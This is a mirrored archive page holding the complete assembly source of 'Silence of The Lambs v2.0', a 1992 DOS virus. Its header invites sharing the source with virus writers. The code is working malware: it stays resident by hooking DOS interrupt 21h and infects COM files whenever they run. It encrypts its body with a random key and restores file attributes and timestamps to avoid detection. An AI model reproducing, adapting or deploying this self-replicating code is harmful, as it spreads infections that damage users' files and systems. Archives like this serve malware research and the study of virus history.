mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 08:38:52 +00:00
322 lines
6.9 KiB
NASM
322 lines
6.9 KiB
NASM
; Silence of The Lambs v2.0
|
||
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
|
||
;
|
||
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
|
||
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
|
||
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
|
||
; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
|
||
; THE ORIGINAL SOURCE.
|
||
;
|
||
; Assemble With A86
|
||
;
|
||
|
||
org 100h
|
||
jmp short dummy1
|
||
db 'DY'
|
||
dummy1:
|
||
mov cx,length
|
||
mov si,offset enc_start
|
||
mov ah,0
|
||
enc_key equ $-1
|
||
dummy2:
|
||
sub byte [si],ah
|
||
inc si
|
||
add ah,0
|
||
enc_add equ $-1
|
||
loop dummy2
|
||
enc_start:
|
||
mov ah,2Dh
|
||
mov ch,0FFh
|
||
mov dx,cx
|
||
int 21h
|
||
cmp al,0FFh
|
||
jne nomore
|
||
|
||
mov ax,cs
|
||
dec ax
|
||
mov ds,ax
|
||
cmp byte [0],'Z'
|
||
jne nomore
|
||
|
||
mov ax,word [3]
|
||
sub ax,pgfsize
|
||
jc nomore
|
||
sub word [3],pgfsize
|
||
sub word [12h],pgfsize
|
||
|
||
mov es,word [12h]
|
||
mov si,110h
|
||
mov di,100h
|
||
mov cx,total
|
||
cld
|
||
rep movsb
|
||
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov si,84h
|
||
mov di,old21
|
||
movsw
|
||
movsw
|
||
|
||
cli
|
||
mov word [84h+2],es
|
||
mov word [84h],offset ni21
|
||
sti
|
||
|
||
nomore:
|
||
push cs
|
||
push cs
|
||
pop es
|
||
pop ds
|
||
|
||
mov bx,0000h ;return control to the
|
||
eof equ $-2 ;end user
|
||
jmp bx
|
||
|
||
xclose: jmp close
|
||
|
||
infect:
|
||
push cs
|
||
pop ds
|
||
push cs
|
||
pop es
|
||
|
||
db 0E4h,40h
|
||
mov byte [enc_key],al
|
||
|
||
mov ax,4300h ;use CHMOD to get file attr
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
mov [0F0h],cx ;store attr in PSP
|
||
|
||
mov ax,4301h ;clear file attr with CHMOD
|
||
xor cx,cx
|
||
int 21h
|
||
|
||
mov ax,3D02h ;open file for read / write
|
||
int 21h
|
||
xchg bx,ax
|
||
lahf
|
||
push ax
|
||
mov ax,5700h ;get file date & time
|
||
int 21h
|
||
|
||
mov [0F2h],cx
|
||
mov [0F4h],dx
|
||
pop ax
|
||
sahf
|
||
jc xclose
|
||
|
||
mov ah,3Fh ;read from file
|
||
mov cx,total
|
||
mov dx,old
|
||
int 21h
|
||
|
||
cmp byte [old+0],'M' ;exe MZ ?
|
||
je xclose
|
||
cmp byte [old+0],'Z' ;exe ZM ?
|
||
je xclose
|
||
cmp word [old+2],'YD' ;allready infected?
|
||
je xclose
|
||
|
||
mov ax,4202h ;lseek to EOF
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
cmp ah,0FAh
|
||
jae xclose
|
||
cmp ah,4
|
||
jb xclose
|
||
|
||
add ax,total+100h
|
||
mov word [00F6h],ax
|
||
|
||
mov ah,40h ;write to EOF
|
||
mov cx,total
|
||
mov dx,old
|
||
|
||
push cx
|
||
mov al,byte [enc_key]
|
||
mov si,dx
|
||
enc_app:
|
||
xor byte [si],al
|
||
inc si
|
||
loop enc_app
|
||
pop cx
|
||
|
||
int 21h
|
||
|
||
mov ah,40h ;write to EOF
|
||
mov cx,applen
|
||
mov dx,offset append
|
||
int 21h
|
||
|
||
mov ax,4200h ;lseek to beginning of file
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
push [eof]
|
||
mov ax,word [00F6h]
|
||
mov [eof],ax
|
||
|
||
mov ah,byte [enc_key]
|
||
db 0E4h,40h
|
||
mov byte [enc_add],al
|
||
mov dl,al
|
||
|
||
mov si,100h
|
||
mov di,old
|
||
|
||
cld
|
||
mov cx,offset enc_start-100h
|
||
rep movsb
|
||
|
||
mov cx,length
|
||
enc:
|
||
lodsb
|
||
add al,ah
|
||
stosb
|
||
add ah,dl
|
||
loop enc
|
||
|
||
mov ah,40h ;write viral code
|
||
mov dx,old
|
||
mov cx,total
|
||
int 21h
|
||
|
||
pop [eof]
|
||
close:
|
||
mov ax,5701h
|
||
mov cx,[00F2h]
|
||
mov dx,[00F4h]
|
||
int 21h
|
||
|
||
mov ah,3Eh ;close file
|
||
int 21h
|
||
|
||
mov ax,4301h
|
||
mov cx,[00F0h]
|
||
xor dx,dx
|
||
int 21h
|
||
ret
|
||
|
||
append:
|
||
call $+3 ;replace org bytes
|
||
pop si
|
||
sub si,3+total
|
||
mov di,100h
|
||
mov cx,total
|
||
mov ah,byte [enc_key]
|
||
append_enc:
|
||
lodsb
|
||
xor al,ah
|
||
stosb
|
||
loop append_enc
|
||
|
||
mov ax,100h ;return IP to 100h when done
|
||
push ax
|
||
|
||
sub ax,ax ;zero regs
|
||
xor bx,bx
|
||
and cx,cx
|
||
sub dx,dx
|
||
xor si,si
|
||
and di,di
|
||
sub bp,bp
|
||
|
||
ret
|
||
applen equ $-offset append
|
||
|
||
ni21:
|
||
pushf
|
||
cmp ah,2Dh
|
||
jne Not_Time
|
||
cmp ch,0FFh
|
||
jne Not_Time
|
||
cmp ch,dh
|
||
jne Not_time
|
||
|
||
mov Al,0
|
||
popf
|
||
iret
|
||
Not_Time:
|
||
cld
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push es
|
||
push ds
|
||
|
||
; cmp ah,41h
|
||
; jne Not_Parse
|
||
; mov ah,3Ch
|
||
; cli
|
||
; add sp,18
|
||
; sti
|
||
; popf
|
||
; jmp old21-1
|
||
|
||
Not_Parse:
|
||
cmp ax,4B00h
|
||
jne Not_Exec
|
||
|
||
mov si,dx
|
||
push cs
|
||
pop es
|
||
xor di,di
|
||
mov cx,128
|
||
rep movsb
|
||
|
||
mov ax,3524h
|
||
int 21h
|
||
push es
|
||
push bx
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov ax,2524h
|
||
mov dx,offset ni24
|
||
int 21h
|
||
|
||
call infect
|
||
|
||
pop dx
|
||
pop ds
|
||
mov ax,2524h
|
||
int 21h
|
||
|
||
Not_Exec:
|
||
pop ds
|
||
pop es
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
jmp far 0000:0000
|
||
old21 equ $-4
|
||
|
||
ni24: mov al,0
|
||
iret
|
||
|
||
db 'The Silence Of The Lambs!$'
|
||
|
||
total equ $-100h ;size
|
||
pgfsize equ (($*2)/16)+2
|
||
length equ $-offset enc_start
|
||
|
||
old equ $
|
||
|
||
|
||
|